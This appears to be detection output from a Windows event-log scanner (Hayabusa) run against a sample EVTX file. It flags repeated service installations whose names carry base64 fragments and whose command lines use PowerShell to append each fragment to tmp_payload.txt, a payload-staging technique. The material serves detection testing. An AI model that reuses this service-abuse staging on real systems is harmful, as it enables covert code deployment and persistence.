+2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
